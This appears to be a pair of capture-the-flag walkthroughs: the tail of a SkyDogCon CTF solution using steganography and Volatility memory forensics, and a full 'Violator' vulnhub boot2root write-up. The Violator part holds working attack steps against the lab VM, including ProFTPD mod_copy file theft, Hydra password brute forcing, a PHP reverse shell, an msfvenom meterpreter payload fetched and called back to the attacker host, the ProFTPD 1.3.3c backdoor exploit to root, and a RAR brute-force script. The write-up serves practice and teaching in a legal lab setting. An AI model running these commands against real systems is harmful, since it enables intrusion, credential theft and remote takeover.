 

As with all CTFs, I have gotten in the habit of checking images for hidden data with strings, exiftool, steghide, binwalk, etc. Running binwalk against this image file indicated the presence of something embedded. I attempted to carve it up for a while and didn’t get anywhere.

root@kali:~/Desktop/skyconCTF# binwalk -e image.jpg 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
2214320       0x21C9B0        MySQL MISAM compressed data file Version 10

I took a stab with steghide but did not have the passphrase. I eventually had a facepalm moment when trying ‘panam’. I extracted the flag.txt file and had the next flag as well as what appeared to be 2 passwords. But for what? It had to be the SSH service as the rest of the web application appeared static but I did not have user name.

root@kali:~/Desktop/skyconCTF# steghide extract -sf image.jpg -p panam
wrote extracted data to "flag.txt".
root@kali:~/Desktop/skyconCTF# cat flag.txt 
flag{d1e5146b171928731385eb7ea38c37b8}
=ILoveFrance

clue=iheartbrenda

Google showed that the ‘fastest man alive’ clue was potentially talking about the Flash, also known as Barry Allen. Google further turned up that Barry Allen was an alias used by Frank Abagnale in the movie to trick the FBI agent tracking him. I put together a list of potential usernames based on all the aliases I could find from the movie and tried various formats.

frank.conners
frank.abagnale
barry.allen
frankconners
frankabagnale
fconners
ballen
frankconners
frankabagnale
barryallen

Trying each of this usernames combined with ‘ILoveFrance’ and ‘iheartbrenda’ eventually got me a successful login: barryallen:iheartbrenda. Logging in got me the next flag.

root@kali:~/Desktop/skyconCTF# ssh barryallen@172.16.94.136 -p 22222
###############################################################
#                         WARNING                             #
#		FBI - Authorized access only!                 # 
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
#         All actions Will be monitored and recorded          #
#	Flag{53c82eba31f6d416f331de9162ebe997}		      #
###############################################################
barryallen@172.16.94.136's password: 
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-38-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

14 packages can be updated.
7 updates are security updates.

/usr/bin/xauth:  file /home/barryallen/.Xauthority does not exist
barryallen@skydogconctf2016:~$ 


barryallen@skydogconctf2016:~$ ls
flag.txt  security-system.data
barryallen@skydogconctf2016:~$ cat flag.txt 
flag{bd2f6a1d5242c962a05619c56fa47ba6}

This MD5 cracked to ‘theflash’.

There was also a large zip file in the user’s home directory which I transferred off using SCP to work on locally.

barryallen@skydogconctf2016:~$ file security-system.data 
security-system.data: Zip archive data, at least v2.0 to extract


root@kali:~/Desktop/skyconCTF# scp -P 22222 barryallen@172.16.94.136:/home/barryallen/security-system.data /root/Desktop/skyconCTF
###############################################################
#                         WARNING                             #
#		FBI - Authorized access only!                 # 
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
#         All actions Will be monitored and recorded          #
#	Flag{53c82eba31f6d416f331de9162ebe997}		      #
###############################################################
barryallen@172.16.94.136's password: 
security-system.data                          100%   71MB  80.0MB/s   00:00

I unzipped the file and ran it through binwalk (which ended up crashing my VM) due to the size), whoops.

root@kali:~/Desktop/skyconCTF# unzip security-system.data.zip 
Archive:  security-system.data.zip
  inflating: security-system.data 

root@kali:~/Desktop/skyconCTF# binwalk -e security-system.data

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
150720        0x24CC0         Microsoft executable, portable (PE)
656418        0xA0422         Copyright string: "Copyright 1985-1998,Phoenix Technologies Ltd.All rights reserved."
819330        0xC8082         Copyright string: "Copyright (C) 2003-2014  VMware, Inc."
819369        0xC80A9         Copyright string: "Copyright (C) 1997-2000  Intel Corporation"
985388        0xF092C         Copyright string: "Copyright 1985-2001 Phoenix Technologies Ltd."
996673        0xF3541         Copyright string: "Copyright 2000-2015 VMware, Inc."
1000211       0xF4313         Copyright string: "Copyright 1985-2001 Phoenix Technologies Ltd."
5074944       0x4D7000        Microsoft executable, portable (PE)
5894224       0x59F050        Copyright string: "Copyright (C) Rational Systems, Inc."
6758664       0x672108        CRC32 polynomial table, little endian
7143424       0x6D0000        Microsoft executable, portable (PE)
17394939      0x1096CFB       mcrypt 2.2 encrypted data, algorithm: blowfish-448, mode: CBC, keymode: 8bit
19261011      0x125E653       mcrypt 2.2 encrypted data, algorithm: blowfish-448, mode: CBC, keymode: 8bit
.......................snip......................

The file appeared to be a memory dump. I haven’t done much forensics so I turned to Google and came up with Volatility on Kali which seems to be a go-to for analyzing memory dumps.

I got started with this guide: http://resources.infosecinstitute.com/memory-forensics-and-analysis-using-volatility/

I first had to check the image info to figure out the operating system the dump came from and set up a profile moving forward.

root@kali:~/Desktop/skyconCTF# volatility imageinfo -f security-system.data 
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)
                     AS Layer2 : FileAddressSpace (/root/Desktop/skyconCTF/security-system.data)
                      PAE type : PAE
                           DTB : 0x33e000L
                          KDBG : 0x80545b60L
          Number of Processors : 1
     Image Type (Service Pack) : 3
                KPCR for CPU 0 : 0xffdff000L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2016-10-10 22:00:50 UTC+0000
     Image local date and time : 2016-10-10 18:00:50 -0400

I next used the ‘files’ plugin and dumped out all the file names.

root@kali:~/Desktop/skyconCTF# volatility --profile=WinXPSP2x86 -f security-system.data filescan > files
Volatility Foundation Volatility Framework 2.5
root@kali:~/Desktop/skyconCTF# cat files | grep flag.txt 
root@kali:~/Desktop/skyconCTF# cat files | grep flag
root@kali:~/Desktop/skyconCTF# cat files | grep .txt
0x0000000005e612f8      1      0 -W-r-- \Device\HarddiskVolume1\Documents and Settings\test\Desktop\code.txt
0x0000000

I grepped for ‘flag.txt’, ‘flag’ and just ‘.txt’ until I got several hits. Code.txt looked particularly promising. Looking at the plugin list I noticed one for checking command line history. Running it got me another Hex string.

root@kali:~/Desktop/skyconCTF# volatility --profile=WinXPSP2x86 -f security-system.data cmdscan
Volatility Foundation Volatility Framework 2.5
**************************************************
CommandProcess: csrss.exe Pid: 560
CommandHistory: 0x10186f8 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 2 LastAdded: 1 LastDisplayed: 1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x2d4
Cmd #0 @ 0x1024400: cd Desktop
Cmd #1 @ 0x4f2660: echo 66 6c 61 67 7b 38 34 31 64 64 33 64 62 32 39 62 30 66 62 62 64 38 39 63 37 62 35 62 65 37 36 38 63 64 63 38 31 7d > code.txt

Once again I was able to use Python to decode the Hex and grab the last flag.

root@kali:~/Desktop/skyconCTF# python
Python 2.7.12+ (default, Sep  1 2016, 20:27:38) 
[GCC 6.2.0 20160822] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> "666c61677b38343164643364623239623066626264383963376235626537363863646338317d".decode('hex')
'flag{841dd3db29b0fbbd89c7b5be768cdc81}'
>>> 

Flag 3 kept me stumped, I ran Wireshark and Ettercap for while since it seemed to allude to traffic sniffing, but no luck. I dug around the file system for a while and did not notice any services calling out. Eventually I took a look at the Apache configuration and found flag3 hidden inside the apache.crt file.

I decoded the base64 in Burp which gave me the MD5 of ‘personnel’. Luckily I found that page with Dirbuster or I would have been quite stuck.

This was a fun challenge and I got to play around with forensics tools a bit. I spent quite some time going through the memory dump with Volatility afterwards, really cool stuff.

Thanks to @jamesbower for putting this challenge together as well as @g0tmi1k and the @vulnhub team for continuing to maintain this community.

Violator vulnhub VM walkthrough

foggie

A while back knightmare asked me to test his boot2root challenge named Violator. Having thoroughly enjoyed his first 3 Droopy, Gibson and Sidney I jumped at the opportunity.

Like his other VMs it had a theme, this one being Depeche Mode themed.

You can grab a copy for yourself here: https://www.vulnhub.com/entry/violator-1,153/

When testing a boot2root I typically approach it as any other challenge, only stopping along the way if I feel I discover a flaw/unintended path, something appears to be broken or I just 100% hit a wall.

Knightmare provided me with the following hints to get going (I’ve also learned by now to set the HDD on all his VMs to non-persistent 🙂 ) :

  • Vince Clarke can help you with the Fast Fashion.
  • The challenge isn’t over with root. The flag is something special.
  • I have put a few trolls in, but only to sport with you.

Without further ado, here goes:

As always, we start off with a quick nmap scan. This one turns up an FTP service and Apache web server.

root@mrb3n:/# nmap -sV 192.168.110.183

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-09-16 10:13 EDT
Nmap scan report for 192.168.110.183
Host is up (0.00011s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5rc3
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 00:0C:29:7D:C7:3C (VMware)
Service Info: OS: Unix

The web server is pretty sparse. There is an image of Foghorn Leghorn  from Looney Tunes as well as a link to a Wikipedia page about the Depeche Mode album ‘Violator, which I can only assume is a hint for later.

root@mrb3n:~# curl -s http://192.168.110.183
<html>
<title>I Say... I say... I say Boy! You pumpin' for oil or somethin'...?</title>
  <body>
    <br>I Say.. I say... I say boy!  You're barkin up the wrong tree!</br>
    <img src="foggie.jpg" alt="foggie.jpg" height=1041" width="731">
   <-- https://en.wikipedia.org/wiki/Violator_(album)  -->
  </body>
</html>

I pulled down the image and checked it with exiftool but did not find any hidden treasures.

Leaving the web server aside and taking a look at the FTP service banner, I find a ProFTPD 1.3.5 File Copy exploit over on exploit-db. Maybe I can use this to pull down something interesting?

I attempt to connect anonymously and get rejected so let’s try out this exploit.  If successful, I will be able to use the mod_copy module SITE CPFR/SITE CPTO commands to read/write files remotely and unauthenticated.

root@mrb3n:~# ftp 192.168.110.183
Connected to 192.168.110.183.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.110.183]
Name (192.168.110.183:root): anonymous
331 Password required for anonymous
Password:
530 Login incorrect.
Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

I go after /etc/passwd first.

ftp> site CPFR /etc/passwd
350 File or directory exists, ready for destination name
ftp> site CPTO /var/www/html/passwd
250 Copy successful
ftp>

Awesome! The web root is writeable and I was able to grab down a list of usernames.

root@mrb3n:~# curl -s http://192.168.110.183/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
dg:x:1000:1000:Dave Gahan,,,:/home/dg:/bin/bash
proftpd:x:104:65534::/var/run/proftpd:/bin/false
ftp:x:105:65534::/srv/ftp:/bin/false
mg:x:1001:1001:Martin Gore:/home/mg:/bin/bash
af:x:1002:1002:Andrew Fletcher:/home/af:/bin/bash
aw:x:1003:1003:Alan Wilder:/home/aw:/bin/bash

So here we have a list of local usernames, which happen to be the members of Depeche Mode. I attempted to grab /etc/shadow but was denied. I grabbed the groups file to see what types of permissions each users have on the target system.

ftp> site CPFR /etc/group
350 File or directory exists, ready for destination name
ftp> site CPTO /var/www/html/group
250 Copy successful

root@mrb3n:~/violator# curl -s http://192.168.110.183/group > group
root@mrb3n:~/violator# cat group | grep sudo
sudo:x:27:dg

The user dg is in the sudoers group so hopefully we can get his creds somehow! At this point I figured I needed some sort of wordlist. The Wikipedia page in the index page source seems like a good candidate. Firing up Cewl I put together a quick wordlist.

root@mrb3n:~/violator# cewl -v 'en.wikipedia.org/wiki/Violator_(album)' -d 1 -w violator.txt

This wordlist didnt get me anywhere. After some fumbling around with various combinations I settled on a wordlist of with all of the song titles, lowercase, without spaces or special characters. First we remove all spaces.

root@mrb3n:~/violator# sed 's/ //g' violator > violator_nospaces

We can clean things up a bit more with cut and tr.

root@mrb3n:~/violator# cut -d'"' -f2 violator_nospaces | tr '[:upper:]' '[:lower:]' > violator_list
root@mrb3n:~/violator# cat violator_list 
worldinmyeyes
sweetestperfection
personaljesus
halo
waitingforthenight
enjoythesilence
policyoftruth
bluedress
clean
dangerous
memphisto
sibeling
kaleid
happiestgirl
seaofsin
enjoythesilence
enjoythesilence
enjoythesilence
sibeling
enjoythesilence
enjoythesilence
enjoythesilence
memphisto

Interesting enough Hydra finds valid passwords for all 4 users. Dg is my target so let’s check his account first.

root@mrb3n:~/violator# hydra -L users -P violator_list ftp://192.168.110.183
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-09-16 14:00:35
[DATA] max 16 tasks per 1 server, overall 64 tasks, 96 login tries (l:4/p:24), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.110.183   login: dg   password: policyoftruth
[21][ftp] host: 192.168.110.183   login: mg   password: bluedress
[21][ftp] host: 192.168.110.183   login: af   password: enjoythesilence
[21][ftp] host: 192.168.110.183   login: aw   password: sweetestperfection
1 of 1 target successfully completed, 4 valid passwords found

Logging in I am in dg’s home directory and am able to change to various other directories, including those for our other 3 users.

root@mrb3n:~# ftp 192.168.110.183
Connected to 192.168.110.183.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.110.183]
Name (192.168.110.183:root): dg
331 Password required for dg
Password:
230 User dg logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/home/dg" is the current directory
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x  10 root     root         4096 Jun  6 20:31 bd
226 Transfer complete
ftp> cd ..
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   3 af       af           4096 Jun 12 09:25 af
drwxr-xr-x   2 aw       aw           4096 Jun 12 09:25 aw
drwxr-xr-x   4 dg       dg           4096 Jun 14 18:55 dg
drwxr-xr-x   2 mg       mg           4096 Jun 12 09:28 mg

I pull down various files for inspection locally.

ftp> get minarke-1.21.tar.bz2
local: minarke-1.21.tar.bz2 remote: minarke-1.21.tar.bz2
200 PORT command successful
150 Opening BINARY mode data connection for minarke-1.21.tar.bz2 (15576 bytes)
226 Transfer complete
15576 bytes received in 0.01 secs (2.7953 MB/s)

150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 aw       aw             59 Jun 12 09:19 hint
226 Transfer complete
ftp> get hint
local: hint remote: hint

150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 mg       mg            112 Jun 12 09:28 faith_and_devotion
226 Transfer complete
ftp> get faith_and_devotion
local: faith_and_devotion remote: faith_and_devotion
200 PORT command successful
150 Opening BINARY mode data connection for faith_and_devotion (112 bytes)
226 Transfer complete

Dg’s home directory contains a more extensive directory listing which we’ll have to come back to later.

ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 root     root         4096 Jun  6 20:31 bin
drwxr-xr-x   2 root     root         4096 Jun  6 20:46 etc
drwxr-xr-x   3 root     root         4096 Jun  6 20:31 include
drwxr-xr-x   4 root     root         4096 Jun  6 20:31 lib
drwxr-xr-x   2 root     root         4096 Jun  6 20:31 libexec
drwxr-xr-x   2 root     root         4096 Jun  6 20:31 sbin
drwxr-xr-x   4 root     root         4096 Jun  6 20:31 share
drwxr-xr-x   2 root     root         4096 Jun  6 22:17 var

Taking a look at our loot, the hint file is a bit vague…for now…

root@mrb3n:~/violator# cat hint
You are getting close... Can you crack the final enigma..?

The Minarke archive is interesting a C file and make file for compiling an Enigma M4 emulator. We know that knightmare is infamous for flag challenges so I am almost certain this will come into play later.

root@mrb3n:~/violator/minarke-1.21# cat minarke.c 
/* Minarke, an Enigma M4 emulator
 *
 * Written by John Gilbert
 * Version 1.21
 * (c) 2008

I compile it and check out the binary. Our suspicions are confirmed. this can be used to crack some Enigma code. Pretty awesome. Now lets find that code!

root@mrb3n:~/violator/minarke-1.21# make
gcc -g -Wall -o minarke minarke.c
root@mrb3n:~/violator/minarke-1.21# ./minarke 


Minarke, an Enigma M4 emulator
by John Gilbert

Emulates the Kriegsmarine M4 Enigma encryption machine

	Initial Setup Notes
Rotors: Reflector (B/C), Thin Rotor (B/G), 3 Rotors (1-8, can't reuse them) 
Use BB### or CG### with A### settings to read/create Wehrmacht three rotor traffic 
Ring and position settings: A-Z for each of the 4 rotors
Reflector setting is always fixed at A.
Plugboard settings: A-Z,A-Z pairs, also won't allow reuse
Hit return to end input, 11 pairs recomended for maximum security.
Hit ESC at any time to quit.

	Special Keys (during input mode)
1: rewind one setting
2: reset position settings
3: new position settings
4: new setup
9: toggle debug
0: show position settings
?: show help

see http://en.wikipedia.org/wiki/Enigma_machine
also http://www.bytereef.org/m4_project.html


Rotors: 

The faith_and_devotion file contains what we need to use the Enigma machine once we have the code.

root@mrb3n:~/violator# cat faith_and_devotion 
Lyrics:

* Use Wermacht with 3 rotors
* Reflector to B
Initial: A B C
Alphabet Ring: C B A
Plug Board A-B, C-D

Now I need a shell. Since /var/www/html appears to be writeable. I attempt to upload a PHP reverse shell. If all goes well and knightmare doesnt have any tricks up his sleeve I should be able to grab a nice reverse shell.

root@mrb3n:~# ftp 192.168.110.183
Connected to 192.168.110.183.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.110.183]
Name (192.168.110.183:root): dg
331 Password required for dg
Password:
230 User dg logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /var/www/html
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 dg       dg          51256 Jun  6 20:00 foggie.jpg
-rw-r--r--   1 proftpd  nogroup       699 Sep 16 17:39 group
-rw-rw-r--   1 dg       dg            318 Jun 12 17:26 index.html
-rw-r--r--   1 proftpd  nogroup      1330 Sep 16 15:24 passwd
226 Transfer complete
ftp> put /var/www/html/violator.php 
local: /var/www/html/violator.php remote: /var/www/html/violator.php
200 PORT command successful
150 Opening BINARY mode data connection for /var/www/html/violator.php
226 Transfer complete
3463 bytes sent in 0.00 secs (33.0257 MB/s)
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 dg       dg          51256 Jun  6 20:00 foggie.jpg
-rw-r--r--   1 proftpd  nogroup       699 Sep 16 17:39 group
-rw-rw-r--   1 dg       dg            318 Jun 12 17:26 index.html
-rw-r--r--   1 proftpd  nogroup      1330 Sep 16 15:24 passwd
-rw-r--r--   1 dg       dg           3463 Sep 16 18:18 violator.php
226 Transfer complete

I browse to my violator.php reverse shell script and sure enough get a connection as www-data.

root@mrb3n:~/violator# curl -s http://192.168.110.183/violator.php

root@mrb3n:~# nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.110.179] from (UNKNOWN) [192.168.110.183] 33641
Linux violator 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 19:20:09 up  3:00,  0 users,  load average: 0.00, 0.01, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@violator:/$ 

I su to the dg user and check what he is able to run as root, since I remembered from earlier that he is part of the sudoers group. Interesting, he can run another version of proftpd as root which what we saw earlier in his  home directory.

www-data@violator:/$ su dg
su dg
Password: policyoftruth

dg@violator:/$ sudo -l
sudo -l
Matching Defaults entries for dg on violator:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dg may run the following commands on violator:
    (ALL) NOPASSWD: /home/dg/bd/sbin/proftpd
dg@violator:~/bd/sbin$ file proftpd
file proftpd
proftpd: ELF 64-bit LSB  executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=8abf34e54323fc0bb0320d1ea3750da2e57ecd08, stripped

dg@violator:~/bd/sbin$ sudo ./proftpd
sudo ./proftpd
 - setting default address to 127.0.0.1
localhost - SocketBindTight in effect, ignoring DefaultServer

We now have another service running locally on port 2121. How can this be abused to gain root privs?

dg@violator:~/bd/sbin$ netstat -antp
netstat -antp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:2121          0.0.0.0:*               LISTEN      -               
tcp        0    218 192.168.110.183:33641   192.168.110.179:443     ESTABLISHED 1391/bash       
tcp6       0      0 :::21                   :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 192.168.110.183:80      192.168.110.179:56414   ESTABLISHED -               
tcp6       0      0 192.168.110.183:21      192.168.110.179:56886   ESTABLISHED -

Connection to port 2121 locally I see we are dealing with ProFTPD 1.3.3c.

dg@violator:~/bd/sbin$ telnet 127.0.0.1 2121
telnet 127.0.0.1 2121
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 ProFTPD 1.3.3c Server (Depeche Mode Violator Server) [127.0.0.1]

This particular FTP client has a known backdoor command execution vulnerability which hopefully we can use to escalate privileges. There are many ways to do this, the way I did it worked but of course there are other options

root@mrb3n:~# searchsploit ProFTPD 1.3.3c
------------------------------------------------- ----------------------------------
 Exploit Title                                   |  Path
                                                 | (/usr/share/exploitdb/platforms)
------------------------------------------------- ----------------------------------
ProFTPD 1.3.3c - Compromised Source Remote Root  | ./linux/remote/15662.txt
ProFTPD-1.3.3c Backdoor Command Execution        | ./linux/remote/16921.rb

It looks like I will need Metasploit to take advantage of this exploit so I quickly create a meterpreter PHP payload and upload it to the target, execute and grab a meterpreter shell.

root@mrb3n:/var/www/html# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.110.179 LPORT=8443 -f raw > violator_meterp.php
root@mrb3n:/var/www/html# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.110.179 LPORT=8443 -f raw > violator_meterp.php

I could have used FTP to transfer the file, but after seeing that knightmare was kind enough to remove curl and wget I had to find another way.

Connection closed by foreign host.
dg@violator:~/bd/sbin$ wget http://192.168.110.179/violator_meterp.php -O /var/www/html/shell.php
< http://192.168.110.179/violator_meterp.php -O /var/www/html/shell.php      
The program 'wget' is currently not installed. You can install it by typing:
sudo apt-get install wget
dg@violator:~/bd/sbin$ curl -O http://192.168.110.179/violator_meterp.php
curl -O http://192.168.110.179/violator_meterp.php
The program 'curl' is currently not installed. You can install it by typing:
sudo apt-get install curl

SCP was still installed so I was able to transfer the file that way, as root which is super secure!

dg@violator:/var/www/html$ scp root@192.168.110.179:/var/www/html/violator_meterp.php .
<scp root@192.168.110.179:/var/www/html/violator_meterp.php .                
root@192.168.110.179's password: 🙂

violator_meterp.php                           100%   26KB  25.6KB/s   00:00 

Don’t forget to chown the file as dg so we can catch a session as this user.

dg@violator:/var/www/html$ chown dg:dg violator_meterp.php

Quickly set up metasploit to catch our shiny new meterpreter shell.

msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter_reverse_tcp 
payload => php/meterpreter_reverse_tcp
msf exploit(handler) > set lhost 192.168.110.179
lhost => 192.168.110.179
msf exploit(handler) > set lport 8443
lport => 8443

Executing the shell I gain a connection and its time to set up some port forwarding so I can attack remote port 2121 directly.

dg@violator:/var/www/html$ phpviolator_meterp.php


msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.110.179:8443 
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.110.179:8443 -> 192.168.110.183:35213) at 2016-09-16 14:50:38 -0400

I use the built-in meterpreter portfwd command to set up the tcp relay.

meterpreter > portfwd add -L 127.0.0.1 -l 2121 -p 2121 -r 127.0.0.1
[*] Local TCP relay created: 127.0.0.1:2121 <-> 127.0.0.1:2121

Searching in metasploit I quickly find the exploit I’m looking for and configure it based on our port forwarding rule.

msf exploit(handler) > search ProFTPD

Matching Modules
================

   Name                                         Disclosure Date  Rank       Description
   ----                                         ---------------  ----       -----------
   exploit/freebsd/ftp/proftp_telnet_iac        2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   exploit/linux/ftp/proftp_sreplace            2006-11-26       great      ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
   exploit/linux/ftp/proftp_telnet_iac          2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
   exploit/linux/misc/netsupport_manager_agent  2011-01-08       average    NetSupport Manager Agent Remote Buffer Overflow
   exploit/unix/ftp/proftpd_133c_backdoor       2010-12-02       excellent  ProFTPD-1.3.3c Backdoor Command Execution
   exploit/unix/ftp/proftpd_modcopy_exec        2015-04-22       excellent  ProFTPD 1.3.5 Mod_Copy Command Execution
msf exploit(proftpd_133c_backdoor) > use cmd/unix/reverse_perl
msf payload(reverse_perl) > show options 

Module options (payload/cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port

msf payload(reverse_perl) > set LHOST 192.168.110.179
LHOST => 192.168.110.179
msf payload(reverse_perl) > exploit
[-] Unknown command: exploit.
msf payload(reverse_perl) > use exploit/unix/ftp/proftpd_133c_backdoor
msf exploit(proftpd_133c_backdoor) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf exploit(proftpd_133c_backdoor) > set LHOST 192.168.110.179
LHOST => 192.168.110.179

I run the exploit and pop a root shell.

msf exploit(proftpd_133c_backdoor) > exploit

[*] Started reverse TCP handler on 192.168.110.179:4444 
[*] Sending Backdoor Command
[*] Command shell session 6 opened (192.168.110.179:4444 -> 192.168.110.183:44484) at 2016-09-16 15:59:57 -0400

id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
python -c 'import pty;pty.spawn("/bin/bash")'
root@violator:/#

Checking for our flag, as I expected, was a troll 🙂

root@violator:/root# cat flag.txt
cat flag.txt
I say... I say... I say boy! Pumping for oil or something...?
---Foghorn Leghorn "A Broken Leghorn" 1950 (C) W.B.

The hidden directory ‘basildon’ in the root directory contains a file, crocs.rar.

root@violator:/root# ls -lah
ls -lah
total 24K
drwx------  3 root root 4.0K Jun 14 19:56 .
drwxr-xr-x 22 root root 4.0K Jun 14 19:44 ..
-rw-r--r--  1 root root 3.1K Feb 20  2014 .bashrc
d--x------  2 root root 4.0K Jun 14 19:57 .basildon
-rw-r--r--  1 root root  114 Jun 12 10:22 flag.txt
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
root@violator:/root# cd .basildon
cd .basildon
root@violator:/root/.basildon# ls -lah
ls -lah
total 148K
d--x------ 2 root root 4.0K Jun 14 19:57 .
drwx------ 3 root root 4.0K Jun 14 19:56 ..
-rw-r--r-- 1 root root 138K Jun 12 14:46 crocs.rar

I move the file over to the web root and pull it down locally for analysis.

root@mrb3n:~/violator# curl -O http://192.168.110.183/crocs.rar
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  137k  100  137k    0     0  20.6M      0 --:--:-- --:--:-- --:--:-- 22.3M

root@mrb3n:~/violator# file crocs.rar 
crocs.rar: RAR archive data, v1d, os: Win32

root@mrb3n:~/violator# unrar e crocs.rar

UNRAR 5.21 freeware      Copyright (c) 1993-2015 Alexander Roshal

Extracting from crocs.rar

Enter password (will not be echoed) for artwork.jpg: 

Hmm, a password protected rar containing an image file. I was stuck here for a while. First I used Cewl to create a word list based on our original Wikipedia page but had no luck. I then ran the earlier song list without spaces that got us our user accounts and still no luck. Combining everything I had and using a quick rar brute force Python script I got a result.

#!/usr/bin/python

import rarfile
import subprocess

subprocess.call('clear', shell=True)
print "Rar file password brute forcer" + '\n'

rFile = rarfile.RarFile('crocs.rar')
PassFile = open('violator_songs')
for line in PassFile.readlines():
        password = line.strip('\n')
        try:
                rFile.extractall(pwd=password)
                print 'Correct Password = ' + password + '\n'
                exit(0)
        except Exception, e:
                pass

Our password, and the artwork.jpg file!

root@mrb3n:~/violator# python rarcracker.py 

Rar file password brute forcer

Correct Password = World in My Eyes

This time exiftool gave us something juicy, which I believe is our Engima code.

root@mrb3n:~/violator# wine /root/Desktop/exiftool.exe artwork.jpg 
ExifTool Version Number         : 10.07
File Name                       : artwork.jpg
Directory                       : .
File Size                       : 183 kB
File Modification Date/Time     : 2016:06:12 14:38:12-04:00
File Access Date/Time           : 2016:09:16 21:03:34-04:00
File Creation Date/Time         : 2016:06:12 14:38:12-04:00
File Permissions                : rw-rw-rw-
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 300
